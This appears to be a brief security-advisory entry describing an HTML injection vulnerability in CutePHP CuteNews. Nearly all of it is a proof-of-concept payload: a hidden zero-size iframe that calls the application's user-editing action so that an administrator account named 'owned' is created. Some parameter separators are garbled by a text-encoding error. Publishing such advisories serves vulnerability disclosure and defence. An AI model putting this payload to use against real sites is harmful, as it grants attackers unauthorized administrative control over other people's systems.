|
CutePHP CuteNews HTML Injection Vulnerability
The following proof of concept will result in the creation of a user account with administrative privileges: <iframe src="index.php?regusername=owned®password= pass®nickname=owned®email=nonenone.com®level= 1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe> |
|
|
Privacy Statement |
